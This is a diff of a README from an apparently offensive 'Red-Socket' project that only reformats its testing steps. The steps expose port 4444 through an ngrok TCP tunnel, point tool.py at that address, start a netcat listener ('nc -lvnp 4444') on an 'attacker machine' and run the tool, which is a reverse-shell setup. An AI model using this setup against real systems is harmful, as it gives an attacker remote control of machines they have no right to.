DanielVihorev/Red-Socket/README.md

 ⸻
 🧪 Testing Instructions
 1. Start Ngrok:
 ngrok tcp 4444

-	2. Update tool.py with your Ngrok TCP address and port.
+2.Update tool.py with your Ngrok TCP address and port.
-	3. Run a listener on your attacker machine:

-nc -lvnp 4444
+3.Run a listener on your attacker machine: nc -lvnp 4444

-	4. Execute the tool:
+4.Execute the tool:
 python3 tool.py
 ⸻

 🔁 CI/CD Integration